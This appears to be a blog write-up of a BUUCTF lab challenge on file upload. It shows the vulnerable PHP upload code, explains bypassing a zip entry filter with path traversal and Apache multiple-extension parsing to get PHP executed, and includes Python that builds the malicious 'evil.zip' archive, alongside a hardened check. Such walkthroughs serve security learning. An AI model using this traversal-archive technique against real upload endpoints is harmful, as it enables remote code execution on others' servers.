Buuctf n1book [Chapter 2 advanced web] file upload
2022-07-21 20:49:00 【narukuuuu】
It took more than a day just to build the docker environment, and only then did I get to write this. I can only say that my environment is too sweet. But this challenge also took a little time to ponder.
Challenge analysis
Opening the challenge, we find the same file upload page as before.
Out of habit I capture the request; the source code of the page is fully exposed. It is too long to reproduce here in full (the analysis below is based on earlier experience and on other masters' write-ups).
<?php
header("Content-Type:text/html; charset=utf-8");
// Uploaded files in the directory are cleared every 5 minutes.
// pclzip.lib.php is included: PclZip provides zip listing and extraction.
require_once('pclzip.lib.php');

// No file uploaded: show the upload page and this source.
if(!$_FILES){
    echo '(HTML of the upload form omitted)';
    show_source(__FILE__);
}else{
    $file = $_FILES['file'];
    // Reject an empty upload.
    if(!$file){
        exit("Do not upload empty files");
    }
    $name = $file['name'];
    $dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
    $path = $dir.$name;
    // strrchr($name, '.') returns everything from the LAST '.' to the end of the string:
    // for an upload named 1.php.txt that is ".txt".
    // substr(..., 1) drops the leading dot, giving "txt", and strtolower() lower-cases it.
    // So only the final extension is ever inspected; 1.php.txt has $ext = "txt".
    // For an upload named 1.txt, $path is upload/1.txt.

    // Recursively delete every file under $dir whose last extension is not jpg/gif/png.
    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            }
        }
    }

    // Create the upload directory and a random per-upload sub-directory.
    if(!is_dir($dir)){
        mkdir($dir);
    }
    $temp_dir = $dir.md5(time(). rand(1000,9999));
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }
    // This is the real obstacle: the sub-directory name is md5(time . random number).
    // We cannot predict the random number, so even after bypassing the extension check
    // we could not reach the uploaded file. Reading this, it is clear the path has to be
    // escaped with traversal. (The traversal itself is not the hard part; getting the
    // file parsed as PHP is.)

    // Extension check: the string after the last '.' must be zip, jpg, gif or png.
    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
        if($ext == 'zip'){
            // Extract with PclZip.
            $archive = new PclZip($file['tmp_name']);
            // Walk every entry in the archive.
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                // Weak check: the regex is anchored only at the end, so it rejects names
                // that END in ".php" and nothing else. "x.php.xxx" passes, and nothing
                // here rejects "../" inside an entry name.
                if(preg_match('/\.php$/', $filename)){
                    exit("Compressed packages are not allowed to contain php files!");
                }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                exit("Decompression failed");
            }
            check_dir($dir);
            exit('Upload successful!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit('Upload successful!');
        }
    }else{
        exit('Only zip, jpg, gif and png files are allowed!');
    }
}
So an uploaded file ends up at upload/<random md5>/<uploaded file name>.
Solution
The entry name we finally put in the archive is /../../hhh.php.xxx. Why this name?
1) /../../
The file has to get past the checks and still land somewhere we can reach, so we use path traversal to drop it into the web root. Extraction happens in upload/<random md5>/: the first level is upload, the second is the random directory, so two .. components climb out of both and into the web root, where the file can be requested directly. A useful side effect is that check_dir() never sees it, because that sweep only walks upload/.
2) hhh.php.xxx
Apache here is version 2.4.7. An entry named hhh.php is rejected by the /\.php$/ check, but hhh.php.xxx is not, while the outer upload still passes the whitelist as a .zip. Once the file sits in the web root, Apache's multiple-extension handling (mod_mime) does the rest: it looks at every dot-separated segment, does not know xxx and ignores it, recognises php and hands the file to the PHP handler, so hhh.php.xxx is executed as a PHP script and we get a shell. Note that this only works when PHP is attached with AddHandler/AddType, which match any segment; a SetHandler inside <FilesMatch "\.php$"> only fires when .php is the final extension and would not execute this file.
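To make the three checks concrete, here is a small Python model of the challenge's server-side logic. This is an added example, not code from the challenge or from the write-up. It assumes the web root is the working directory (upload/ is a relative path in the source) and that PclZip writes an entry to PCLZIP_OPT_PATH . '/' . name without normalising '..', which is the behaviour the write-up observed. hardened_member_ok is a hypothetical corrected check, not something on the page.

```python
"""Model of the challenge's checks: the last-extension whitelist, the regex on
archive entries, and check_dir()'s sweep of upload/. Added example, not the
challenge's code. Assumption: web root == current directory, and PclZip joins
PCLZIP_OPT_PATH and the stored entry name with '/' and no '..' normalisation."""
import posixpath
import re

UPLOAD_DIR = "upload/"
IMAGE_EXTS = {"jpg", "gif", "png"}
UPLOAD_EXTS = IMAGE_EXTS | {"zip"}


def php_ext(name: str) -> str:
    """strtolower(substr(strrchr($name, '.'), 1)): text after the LAST dot, lower-cased."""
    dot = name.rfind(".")
    return name[dot + 1:].lower() if dot != -1 else ""


def upload_ext_ok(name: str) -> bool:
    """in_array($ext, array('zip','jpg','gif','png')) on the outer upload name."""
    return php_ext(name) in UPLOAD_EXTS


def challenge_member_ok(member: str) -> bool:
    """The only check on archive entries: !preg_match('/\\.php$/', $filename).
    Anchored at the end, so 'x.php.xxx' passes; '../' is never looked at."""
    return re.search(r"\.php$", member) is None


def extracted_path(temp_dir: str, member: str) -> str:
    """Where PclZip writes an entry: PCLZIP_OPT_PATH . '/' . name, as the OS resolves it."""
    return posixpath.normpath(temp_dir + "/" + member)


def survives_check_dir(path: str) -> bool:
    """check_dir($dir) unlinks every file under upload/ whose last extension is not an
    image type. Anything written outside upload/ is never visited."""
    if not path.startswith(UPLOAD_DIR):
        return True
    return php_ext(path) in IMAGE_EXTS


def challenge_outcome(member: str, temp_dir: str) -> str:
    """Fate of one zip entry under the challenge's logic."""
    if not challenge_member_ok(member):
        return "rejected by /\\.php$/"
    dest = extracted_path(temp_dir, member)
    if not survives_check_dir(dest):
        return "deleted by check_dir"
    return "stays at " + dest


def hardened_member_ok(member: str) -> bool:
    """Hypothetical fix (not from the page): refuse absolute names and any '..'
    segment before normalising, allow exactly one extension, and require it to be
    an image type. Looking at every dot-separated segment matters because Apache's
    mod_mime does the same, so 'a.php.xxx' must not slip through."""
    if "\x00" in member or "\\" in member or member.startswith("/"):
        return False
    if ".." in member.split("/"):
        return False
    segments = posixpath.basename(posixpath.normpath(member)).lower().split(".")
    return len(segments) == 2 and segments[0] != "" and segments[1] in IMAGE_EXTS


if __name__ == "__main__":
    tmp = "upload/" + "3f2a9c1e" * 4  # stands in for md5(time().rand(1000,9999))
    for m in ("hhh.php", "hhh.php.xxx", "/../../hhh.php.xxx", "cat.jpg"):
        print(f"{m:22} -> {challenge_outcome(m, tmp):48} hardened: {hardened_member_ok(m)}")
```

Running it shows the three fates side by side: hhh.php is stopped by the regex, hhh.php.xxx is extracted but then unlinked by check_dir, and /../../hhh.php.xxx is the only PHP-bearing name that both passes the regex and lands outside the swept directory.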
First, create a file (a file, not a folder!). Its extension is irrelevant; the only requirement is that the name is exactly 18 characters long, the same length as /../../hhh.php.xxx, so that the new name overwrites the old one completely, suffix included, without changing the file-name length fields stored in the zip headers.
Compress the file into a zip.
Open the archive in 010 Editor.
Change the file name to /../../hhh.php.xxx (when I tried /../../1.php.xxx it did not work; I think it was a length problem, but looking at some masters' write-ups again?? It is a little strange.)
Upload the archive; this bypasses the extension check. In Kali we can see that the file has been uploaded successfully, so we visit it.
Get the flag.
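Instead of zipping a placeholder and hex-editing the name in 010 Editor, the archive can be built directly with Python's zipfile module, which writes whatever entry name it is given. The following is an added example, not part of the write-up: the payload body is a constructed placeholder and ORIGINAL_NAME is a made-up 18-character name standing in for whatever file was zipped first. It also parses the local file header to show the 2-byte name-length field that makes the hex-edit route length-sensitive.

```python
"""Build the traversal archive directly (added example, not from the write-up).
zipfile only sanitises entry names on extraction, never on write, so
'/../../hhh.php.xxx' is stored verbatim. The entry name appears twice in a zip
(local file header and central directory), each preceded by a 2-byte length, which
is why an in-place overwrite in a hex editor must keep the length unchanged."""
import io
import struct
import zipfile

PAYLOAD_NAME = "/../../hhh.php.xxx"    # 18 bytes; '../../' climbs out of upload/<md5>/
ORIGINAL_NAME = "originalname_a.txt"   # made-up 18-byte name to zip first when hex-editing
PAYLOAD = b"<?php echo 'constructed placeholder'; ?>\n"  # constructed sample body


def build_zip(member_name: str, data: bytes) -> bytes:
    """Return a stored (uncompressed) zip holding one entry under an arbitrary name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr(zipfile.ZipInfo(member_name), data)
    return buf.getvalue()


def archive_names(zip_bytes: bytes) -> list:
    """Entry names exactly as stored, i.e. what PclZip's listContent() would report."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def local_header_name(zip_bytes: bytes) -> tuple:
    """Parse the first local file header: signature at offset 0, name length at
    offset 26, extra length at 28, and the name itself starting at offset 30."""
    (sig,) = struct.unpack_from("<I", zip_bytes, 0)
    if sig != 0x04034B50:
        raise ValueError("not a local file header")
    name_len, _extra_len = struct.unpack_from("<HH", zip_bytes, 26)
    return zip_bytes[30:30 + name_len].decode(), name_len


def can_patch_in_place(old: str, new: str) -> bool:
    """An editor overwrite that leaves the length fields alone only works when the
    encoded lengths match; a 16-byte '/../../1.php.xxx' cannot replace an 18-byte name."""
    return len(old.encode()) == len(new.encode())


def patch_name_in_place(zip_bytes: bytes, old: str, new: str) -> bytes:
    """Mimic the hex-editor route: overwrite every copy of the name byte for byte."""
    if not can_patch_in_place(old, new):
        raise ValueError("replacement name must be the same length as the original")
    return zip_bytes.replace(old.encode(), new.encode())


if __name__ == "__main__":
    direct = build_zip(PAYLOAD_NAME, PAYLOAD)
    patched = patch_name_in_place(build_zip(ORIGINAL_NAME, PAYLOAD), ORIGINAL_NAME, PAYLOAD_NAME)
    print(archive_names(direct), local_header_name(direct))
    print("hex-edit route gives the same entry:", archive_names(patched) == archive_names(direct))
    with open("evil.zip", "wb") as f:  # upload this as the 'file' form field
        f.write(direct)
```

Both routes produce an archive whose single entry is /../../hhh.php.xxx; the name length field reads 18 either way, and can_patch_in_place explains why a shorter replacement such as /../../1.php.xxx cannot simply be typed over the original in a hex editor.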
Addendum: verifying the upload path, hahaha
Upload any file that passes the whitelist (an image). In Kali you can see that the path really is upload/<random md5>/<file name>.
References:
https://blog.csdn.net/zy15667076526/article/details/114139749
https://www.cnblogs.com/murkuo/p/14915458.html